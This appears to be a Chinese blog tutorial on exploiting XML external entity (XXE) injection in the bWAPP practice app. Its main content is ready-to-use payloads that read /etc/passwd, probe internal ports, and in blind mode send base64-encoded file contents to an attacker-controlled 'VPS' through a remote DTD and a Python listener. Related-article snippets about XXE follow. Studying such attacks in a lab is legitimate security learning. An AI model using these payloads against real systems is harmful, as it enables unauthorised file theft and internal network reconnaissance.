xxe漏洞利用

最新推荐文章于 2024-03-03 02:02:45 发布
最新推荐文章于 2024-03-03 02:02:45 发布
阅读量4.1k 收藏 1
点赞数
文章标签: 安全 web安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43774222/article/details/123423284
版权

xxe

phpstudy 版本为5.4.45,高版本可以会报错

有回显xxe

点击any bugs,使用burp抓包
在这里插入图片描述

burp抓到的数据包如下(响应报错原因为php版本过高)
在这里插入图片描述

文件读取

修改xml内容,调用实体test,读取本地passwd文件

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE copyright [
<!ENTITY test SYSTEM "file:///g://etc/passwd">
]>
<reset><login>&test;</login><secret>Any bugs?</secret></reset>

在这里插入图片描述

读取服务器文件

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE copyright [
<!ENTITY test SYSTEM "http://127.0.0.1/bWAPP_latest/etc/passwd">
]>
<reset><login>&test;</login><secret>Any bugs?</secret></reset>

在这里插入图片描述

端口探测
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE copyright [
<!ENTITY test SYSTEM "http://127.0.0.1:80">
]>
<reset><login>&test;</login><secret>Any bugs?</secret></reset>

端口开放,会显示内容,或抛出警告如下

在这里插入图片描述
在这里插入图片描述

端口不开放则显示failed to load external
在这里插入图片描述

无回显xxe

1判断是否存在xxe漏洞

访问DNSlog,测试xxe漏洞是否存在

在这里插入图片描述

在这里插入图片描述

2 数据外带

外带到vps中

vps中的dtd文件

<!ENTITY % all "<!ENTITY &#x25; send SYSTEM 'http://VPS的地址:2121/%file;'>">
%all;

在这里插入图片描述

使用python3模块搭建http服务

python3 -m http.server 2121

在这里插入图片描述

burp提交数据

<?xml version="1.0"?>
<!DOCTYPE message [
    <!ENTITY % remote SYSTEM "http://VPS的http服务/xml.dtd">  
    <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///g://etc/passwd">
    %remote;
    %send;
]>

在这里插入图片描述

成功外带数据

在这里插入图片描述

将外带数据解码

在这里插入图片描述

L0st1amb
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
XXE漏洞利用
weixin_45253622的博客
05-20 2102
XXE(XML外部实体注入) 漏洞介绍 漏洞复现 漏洞防御 漏洞介绍 XXE(XMLExternal Entity Injection)也就是XML外部实体注入,XXE漏洞发生在应用程序解析XML输入时,XML文件的解析依赖libxml库,而libxml2.9以前的版本默认支持并开启了对外部实体的引用,服务端解析用户提交的XML文件时,未对XML文件引用的外部实体(含外部一般实体和外部参数实体)做合适的处理,并且实体的URL支持file://和ftp://等协议,导致可加载恶意外部文件和代码,造成
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
09-15
XXE 漏洞利用 - 任意文件读取 无回显 XXE(XML External Entity)是一种常见的 Web 应用程序漏洞,攻击者可以通过构造恶意的 XML 文档, trick 服务器将任意文件读取出来,导致敏感信息泄露。在本节中,我们将详细...
网络安全课第五节 XXE 漏洞的检测与防御
fegus的博客
07-11 1508
上一讲我们介绍了 SSRF 漏洞,一种专门针对服务端的请求伪造攻击,常被用于攻击内网。在里面我介绍了 Burp Collaborator 用于专门测试无回显漏洞的功能,在本讲的 XXE 漏洞测试中,我们依然可以使用,不知道你是否还记得怎么使用?下面,我们就开始今天的课程,一场关于 XML 外部实体注入(XXE)漏洞的攻防之路。XXE(XML External Entity,XML 外部实体注入)正是当允许引用外部实体时,通过构造恶意内容,导致读取任意文件、执行系统命令、内网探测与攻击等危害的一类漏洞。PHP
第四节 XXE漏洞利用 - 任意文件读取-01
09-15
XXE漏洞利用 - 任意文件读取 XXE(Xml External Entity)漏洞是一种常见的安全漏洞,特别是在Web应用程序中广泛存在。XXE漏洞是由于XML解析器对外部实体的解析不当所致,攻击者可以通过构建恶意XML文件来实现文件...
5、XXE漏洞pdf资料
10-15
总之,XXE漏洞利用了XML解析器处理外部实体时的不安全性。理解XML的结构和解析机制是防止这类攻击的关键。开发人员应采取适当的安全措施,确保XML解析过程安全,以防止攻击者通过XXE漏洞获取敏感信息或执行恶意操作...
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
3. 内网探测:攻击者可以利用XXE漏洞探测内网中的服务和设备状态。 4. DoS攻击:通过大量请求外部资源,消耗服务器资源,导致服务不可用。 **三、XXE检测** 检测XXE漏洞通常分为白盒和黑盒两种方式: 1. **白盒**:...
SCAN_XXE:利用XML XXE漏洞
05-07
在"SCAN_XXE:利用XML XXE漏洞"的主题中,我们将深入探讨这一安全威胁及其防范措施。 XML是可扩展标记语言(eXtensible Markup Language),广泛用于数据交换和配置文件。XML解析器在处理文档时,会识别并处理实体...
XXE漏洞的原理和利用
qq_51796436的博客
01-03 988
XXE全称为XML外部实体注入、 XML XML是可扩展标识语言的简写,和HTML的形式很像,后来用于应用程序之间数据传输的常用格式 HTML旨在显示信息,XML旨在传输信息 XML实体 根据实体来源可定义为内部实体和外部实体。XML定义了两种类型的ENTITY,一种在XML文档中使用,另一种作为参数在DTD文件中使用,定义好的ENTITY在文档中通过“&实体名;”来使用 也就是说可以把实体当作xml的变量 DTD DTD使数据格式之间按照相同的标准来传输 DTD使一种XML约束模式语言,用来解
XXE漏洞漏洞及利用方法解析
weixin_43749601的博客
03-02 2412
XXE(XML External Entity Injection)即XML外部实体类注入漏洞。XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。XXE漏洞触发的点往往是可以上传XML文件的位置,没有对上传的XML文件进行过滤,导致可上传恶意XML文件。 0x001 XML XML设计用来传送及携带数据信息,不用来表现或展示数据,HTML则用来表现数据,所以XML用途的焦点是它说明数据是什么,以
xxe漏洞原理与利用
最新发布
Au_Wind的博客
03-03 1008
xxe漏洞原理与应用
XXE学习(含pikachu)
qq_51558360的博客
01-25 284
xml基础知识 XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素 <?xml version="1.0" ?>//XML声明 <!DOCTYPE note [ <!ELEMENT note (to,from,heading,body)> <!ELEMENT to (#PCDATA)> <!EL
XXE漏洞原理利用、攻击防御手段有哪些
白帽黑客鹏哥的博客
12-14 1386
XXE,全称是XML外部实体注入(XML External Entity Injection),是一种针对应用程序处理XML数据的安全漏洞。这种漏洞允许攻击者对正在解析XML数据的应用程序进行攻击,可能导致未授权的数据访问、服务拒绝攻击,甚至在某些情况下执行远程代码。
XXE漏洞分析
qq_53058639的博客
01-15 136
替换标准poc中相应部分即可,这种情况比较不稳定,根据不同xml解析器会得到不同的回显报错结果,例如我87关闭,88端口有web服务。这种命名实体调用外部实体,发现evil.xml中不能定义实体,否则解析不了,感觉命名实体好鸡肋,参数实体就好用很多。调用过程为:参数实体dtd调用外部实体evil.xml,然后又调用参数实体all,接着调用命名实体send。2.第二种命名实体+外部实体+参数实体写法 中的evil.xml文件对。XML实体分为四种:字符实体,命名实体,外部实体,参数实体。
XXE漏洞安全-全网最详细讲解】
LCW991207的博客
08-04 4659
XXE(XML External Entity)漏洞是一种安全漏洞,出现在使用XML解析器的应用程序中。它允许攻击者利用可信任的XML扩展功能来执行恶意操作,如读取本地文件、发起远程网络请求或执行任意命令。XXE漏洞的发生通常是由于应用程序在解析XML输入时未正确验证或限制实体引用。攻击者可以通过构造恶意的XML输入,将外部实体(external entity)引用进来,然后利用这些实体来获取敏感信息或进行其他攻击。
web安全】——XXE漏洞快速入门
Demo不是emo的博客
11-27 9424
XXE漏洞很难不想学?带你快速入门!
(39.2)【XXE漏洞专题】XXE原理、产生、检测、危害、利用、示例
04-26 3660
【专题】XXE入门
XXE漏洞深入探索:从新手到高手
**XXE漏洞利用方法**: - **内部文件访问**:通过定义外部实体来读取服务器上的文件,如上面提到的/etc/passwd。 - **DNS查询**:利用外部实体发起DNS请求,获取目标服务器的DNS记录,可能泄露内部网络信息。 - **...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值